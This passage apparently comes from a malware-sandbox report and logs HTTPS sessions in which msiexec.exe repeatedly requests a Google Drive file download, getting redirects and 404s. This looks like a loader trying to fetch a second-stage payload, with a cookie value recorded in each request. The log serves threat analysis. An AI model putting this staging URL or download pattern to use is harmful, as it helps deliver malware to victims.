                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:35 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRUz2FZIkOfgU2aeRyQlw5lPPsaLEp_bq5g_wWDlyC2Sl1Seo2ZK5Mst5n6l-Yz6chmkiAMhmE
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:35 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-ZfsrMncR0JDfXumceUBEVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:35 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UoJ31DX960U4aVPR4_zWkg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          32 | 192.168.2.6 | 50017 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:36 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:36 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:36 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-jKuMX8b_3NLzTNq69KyXtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          33 | 192.168.2.6 | 50018 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:37 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:37 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSl9bKnFmla5yI3jftmUGd5Y01uJ_87WEoaqxjNAIiJTBK-u85HW1ZY3hjaiJOk282w
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:37 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-vpoGtNTFVBEq09nPPrHhPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:37 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ua_K_MbioZhl-W06nLJI_A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          34 | 192.168.2.6 | 50019 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:38 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:39 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:38 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce--5fgUzjsOf4hV21T-Av4SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          35 | 192.168.2.6 | 50020 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:39 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:40 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQ-nzvoC-4Y3YrNEtD6IjLPj8vWDW6UeEprxZZPFR_fpsxJH9ZauF2vRGNa4ash7M19P74EslM
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:40 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-PsAKkt8JSluzSuCkRnObUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:40 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cxpU6SRTWj1lSs7jp08uUw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          36 | 192.168.2.6 | 50021 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:40 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:41 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-yWpF4vq17NV_19Egl0Rj1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          37 | 192.168.2.6 | 50022 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:42 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:42 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgT82xnqDMXBe2NQBSTh0KXnC2SFPzxHYbugdGAhCPmRUN84c0JF2ijRI8qU80jplHR28k_JWm0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:42 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-psnLVJ-QUzYvu4-bzGkMdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:42 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="14BikzLg4YKgCfWfPFYE_A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          38 | 192.168.2.6 | 50023 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:43 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:43 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:43 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-PFaZlVlGaTmhZHIEMJAhlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          39 | 192.168.2.6 | 50024 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:44 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:44 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgR5T5IIBNlAu68id9NUqC8TCjv0seuOtJIzS6MwKA9Hv5G2OqtoT7eu8hVXQX-TOKhW
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:44 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Dp2O-2xiLaCnMIibsL5aCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
